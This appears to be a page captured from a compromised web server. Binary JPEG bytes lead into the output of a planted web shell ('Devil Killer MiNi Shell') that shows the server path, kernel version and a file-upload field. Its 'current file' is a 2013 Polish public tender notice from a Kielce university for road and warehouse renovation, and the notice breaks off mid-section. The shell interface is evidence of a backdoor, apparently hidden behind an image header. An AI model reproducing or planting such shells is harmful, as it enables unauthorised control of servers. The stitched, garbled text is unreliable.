JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130517/193692-N-2013.html

<p class="kh_header"><b>Kielce: Modernizacja i rozwój infrastruktury dydaktyczno - badawczej dla innowacyjnego kształcenia na kierunku Transport  w zakresie: przebudowy 
i remontu dróg i nawierzchni utwardzonych pod stanowiska laboratoryjne do badań drogowych pojazdów w rejonie hali małej, remontu budynków zaplecza magazynowego nr 2,3 i byłego magazynu materiałów pędnych na potrzeby laboratorium drogowego oraz remontu oświetlenia zewnętrznego.</b><br>
<b>Numer ogłoszenia: 193692 - 2013; data zamieszczenia: 17.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Świętokrzyska , Al. Tysiąclecia Państwa Polskiego 7, 25-314 Kielce, woj. świętokrzyskie, tel. 041 3424150, faks 041 3443874,041 3424140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tu.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja i rozwój infrastruktury dydaktyczno - badawczej dla innowacyjnego kształcenia na kierunku Transport  w zakresie: przebudowy 
i remontu dróg i nawierzchni utwardzonych pod stanowiska laboratoryjne do badań drogowych pojazdów w rejonie hali małej, remontu budynków zaplecza magazynowego nr 2,3 i byłego magazynu materiałów pędnych na potrzeby laboratorium drogowego oraz remontu oświetlenia zewnętrznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane w ramach projektu Modernizacja i rozwój infrastruktury dydaktyczno-badawczej dla innowacyjnego kształcenia na kierunku Transport obejmujące: przebudowę i remontu dróg i nawierzchni utwardzonych pod stanowiska laboratoryjne do badań drogowych pojazdów w rejonie hali małej, remont budynków zaplecza magazynowego nr 2,3 i byłego magazynu materiałów pędnych na potrzeby laboratorium drogowego oraz remont oświetlenia zewnętrznego.
1.Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa - stanowiąca załącznik nr  1  do SIWZ, która składa się z:  
1.1  dokumentacji projektowej 
1.1.1 Modernizacja polegająca na przebudowie i remoncie dróg i nawierzchni utwardzonych pod stanowiska laboratoryjne do badań drogowych pojazdów w rejonie hali małej
1.1.1  a) Projekt budowlano - wykonawczy - branża drogowa
1.1.1 b) Projekt budowlano - wykonawczy - zabezpieczenie studni głębinowej - branża konstrukcja
1.1.1 c) Projekt budowlano - wykonawczy - branża sanitarna
1.1.1 d) Projekt budowlano - wykonawczy - branża elektryczna - oświetlenie zewnętrzne
1.1.1 e) Projekt budowlano - wykonawczy - odwodnienie dróg i placów
1.1.2 Modernizacja polegająca na remoncie budynku zaplecza magazynowego nr 3 na potrzeby laboratorium drogowego
1.1.3 Modernizacja polegająca na remoncie budynku zaplecza magazynowego nr 3 na potrzeby laboratorium drogowego - instalacje elektryczne
1.1.4 Modernizacja polegająca na remoncie budynku zaplecza magazynowego nr 2 na potrzeby laboratorium drogowego
1.1.5 Modernizacja polegająca na remoncie budynku byłego magazynu materiałów pędnych na potrzeby laboratorium drogowego
1.2 Specyfikacji technicznych wykonania i odbioru robót: 
1. Specyfikacja techniczna wykonania i odbioru robót budowlanych  - branża drogowa, 
2. Specyfikacja techniczna wykonania i odbioru robót budowlanych  - branża budowlana, 
3. Specyfikacja techniczna wykonania i odbioru robót budowlanych  - branża elektryczna.
2.	Użyte w dokumentacji projektowej nazwy produktów, firm lub źródło ich pochodzenia służą wyłącznie do określenia minimalnych parametrów technicznych i jakościowych urządzeń oraz materiałów , których wymaga Zamawiający. W przypadku gdy Wykonawca  zamierza  zastosować  inne niż wskazane w dokumentacji projektowej materiały i urządzenia jest zobowiązany wykazać, iż oferowane materiały i urządzenia spełniają parametry techniczne i jakościowe wymagane przez  Zamawiającego  i nie są gorsze od tych wskazanych w dokumentacji projektowej (materiały i urządzenia równoważne). Wykonawca, który oferuje zastosowanie materiałów lub urządzeń równoważnych ma obowiązek wskazać w swojej ofercie, jakie materiały lub urządzenia równoważne oferuje: podać nazwę, typ, rodzaj, producenta, parametry techniczne i jakościowe oferowanego materiału lub urządzenia, równoważnego pozwalające jednoznacznie zidentyfikować produkt. 
3.	Załączone do dokumentacji przedmiary  robót i kosztorysy nakładcze nie stanowią elementu dokumentacji projektowej mają charakter orientacyjny i pomocniczy. Wykonawca jest zobowiązany do  dokonania własnych  ustaleń co do  rzeczywistego zakresu  robót wymaganego do osiągnięcia rezultatu i  ponosi z tego tytułu ryzyko. 
4.	Zaleca się dokonanie przez wykonawców wizji lokalnej w celu sprawdzenia stanu rzeczywistego. 
5.	Jeżeli, dostarczona przez Zamawiającego dokumentacja projektowa wraz ze specyfikacjami technicznymi wykonania i odbioru robót będzie zawierała wady, które uniemożliwią prawidłowe wykonanie robót, albo jeżeli zajdą inne okoliczności niezależne od Wykonawcy i Zamawiającego, które mogą przeszkodzić prawidłowemu wykonaniu robót, Wykonawca niezwłocznie powiadomi o tym fakcie Zamawiającego. Zamawiający dokona wówczas analizy zaistniałego przypadku i po uzyskaniu stanowiska projektanta i inspektora nadzoru będzie  uprawniony do modyfikacji sposobu  świadczenia Wykonawcy, w taki sposób aby  zrealizowany został cel  umowy z zachowaniem obowiązujących przepisów. 
6.	Wykonanie zamówienia obejmuje również:
a)	wykonanie wszelkich robót przygotowawczych i porządkowych, w tym zagospodarowania placu budowy, w czasie wykonywania robót, utrzymania i później likwidacji zaplecza budowy, wraz z wykonaniem i likwidacją mediów na potrzeby realizacji robót oraz ich użytkowanie w tym dokonanie rozliczeń związanych z korzystaniem z mediów dostępnych na placu budowy, 
b)	właściwe postępowanie z odpadami powstałymi przy wykonywaniu przedmiotu umowy; Wykonawca ponosi pełną odpowiedzialność za naruszenie przepisów dotyczących ochrony środowiska na terenie budowy i na terenie przyległym do terenu oraz postępowanie z odpadami w stopniu całkowicie zwalniającym od tej odpowiedzialności Zamawiającego [(ustawa z dnia 27 kwietnia 2001r. o odpadach (tekst jedn. Dz. U. z 2007r. Nr 39, poz. 251 z późn. zm.) oraz ustawa z dnia 27 kwietnia 2001r. Prawo ochrony środowiska (tekst jedn. Dz. U. z 2008r.  Nr 25, poz. 150 z późn. zm.)],
c)	dostarczenie instrukcji użytkowania zamontowanego sprzętu i urządzeń, 
d)	wykonanie dokumentacji powykonawczej.
7.	Zamawiający wymaga udzielenia gwarancji i rękojmi na okres nie krótszy niż 60 miesięcy od dnia odbioru końcowego na warunkach określonych we wzorze umowy stanowiącym Załącznik nr 10 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.	Zamawiający przewiduje udzielanie zamówień uzupełniających.
2.	Planowana  wielkość  zamówień  uzupełniających  ustala się  do 10%  wartości zamówienia podstawowego.
3.	Zamówienia uzupełniające będą dotyczyły robót budowlanych tego samego rodzaju jak w zamówieniu podstawowym, których konieczność realizacji Zamawiający stwierdzi w okresie 3 lat od daty zawarcia zamówienia podstawowego i które znajdą źródło finansowania.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.26.25.00-6, 45.42.10.00-4, 45.32.00.00-6, 45.26.13.10-0, 45.22.31.00-7, 45.41.00.00-4, 45.42.11.52-4, 45.43.00.00-0, 45.33.20.00-3, 45.45.00.00-6, 45.11.27.00-2, 45.11.11.00-9, 45.11.12.00-0, 45.23.32.20-7, 45.23.32.22-1, 45.23.31.40-2, 45.31.61.10-9, 45.23.24.52-5, 45.23.21.30-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawcy wniesienia wadium w kwocie 45 000 zł  (słownie złotych: czterdzieści pięć tysięcy 00/100) przed upływem terminu składania ofert. Wadium musi obejmować okres związania ofertą. Potwierdzoną za zgodność kopię dowodu wpłaty wadium należy dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie  oświadczenia o spełnieniu warunków udziału w trybie art. 22 ust. 1 ustawy PZP- wg wzoru stanowiącego Załącznik nr 2 do SIWZ, wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonali należycie co najmniej dwa zamówienia odpowiadające przedmiotowi zamówienia, tzn. wykonywali roboty budowlane, każda z nich o wartości brutto nie mniejszej niż 1 500 000,00 złotych polegające na budowie, przebudowie lub rozbudowie obiektów budowlanych. Wykonawcy powinni podać rodzaj i wartość robót budowlanych jakie wykonali, daty i miejsca wykonania oraz załączyć dowody, że roboty zostały wykonane w sposób należyty i prawidłowo ukończone
Ocena spełnienia warunku nastąpi na podstawie  dokumentów:
-wykazu robót budowlanych (wg wzoru stanowiącego Załącznik nr 3 do SIWZ) 
-dokumentów potwierdzających, że wykazane roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać dysponowanie osobami zdolnymi do wykonania zamówienia, przez co rozumie się dysponowanie co najmniej:
-1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności w specjalności drogowej,
-1 osobą posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej,
-1 osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
-1 osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i co najmniej dwoma osobami posiadającymi zaświadczenie kwalifikacyjne E do 1 kV.
Ocena spełnienia w/w warunków nastąpi na podstawie dokumentów:
-wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat zakresu wykonywanych przez nie czynności, oraz informacji o podstawie do dysponowania tymi osobami (wg wzoru stanowiącego Załącznik nr 4 do SIWZ),
-oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (wg wzoru Załącznika nr 5 do SIWZ), wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że:
-dysponują środkami lub posiadają zdolność kredytową w kwocie minimum
1 500 000,00 zł;
-posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości sumy ubezpieczenia nie mniejszej niż 1 500 000,00 zł.
Ocena spełnienia w/w warunków nastąpi na podstawie  dokumentów:
-informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem składania ofert lub  
-opłaconej polisy ubezpieczenia, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych robót budowlanych (co najmniej dwa zamówienia odpowiadające przedmiotowi zamówienia, każde z nich o wartości brutto nie mniejszej niż 1 500 000,00 złotych polegające na budowie, przebudowie lub rozbudowie obiektów budowlanych), wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; - wzór wykazu robót - Załącznik  nr 3 do SIWZ;
dowodami są poświadczenia lub inne dokumenty, jeżeli z uzasadnionych przyczyn 
o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczeń.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy wykazując spełnienie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP  Wykonawca polega na zasobach  innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP a podmioty te będą brały udział w realizacji części zamówienia  Zamawiający żąda  od Wykonawcy:
a)przedstawienia pisemnego zobowiązania tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - według Załącznika nr 7 do SIWZ, 
b)W celu potwierdzenia braku podstaw do wykluczenia z postępowania Wykonawca składa:
1. oświadczenie o braku podstaw do wykluczenia zgodnie z art. 24 ust. 1 ustawy PZP - Załącznik  nr 6 do SIWZ;
2. aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert,  
3. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4. aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana  postanowień umowy może nastąpić w zakresie:
1.1 zmiany sposobu świadczenia, na skutek następujących okoliczności: 
a)	niedostępności na rynku materiałów lub urządzeń, wskazanych w dokumentacji projektowej  specyfikacji technicznej wykonania i odbioru robót spowodowane zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń o ile te materiału  i urządzenia  zostały przyjęte w ofercie Wykonawcy , 
b)	koniecznością wykonania robót wymagających zastosowania innych rozwiązań technicznych/ technologicznych, niż wskazane w dokumentacji projektowej w sytuacji, gdyby zastosowanie przewidzianych w dokumentacji projektowej rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy, 
c)	koniecznością usunięcia wad w dokumentacji projektowej, których nie można było przewidzieć w dniu zawierania umowy,  
Dokonując zmiany sposobu  świadczenia, strony  wyodrębnią:  
-	roboty zamienne, tj. roboty, które Wykonawca wykona w zamian robót zawartych w pierwotnej dokumentacji projektowej, 
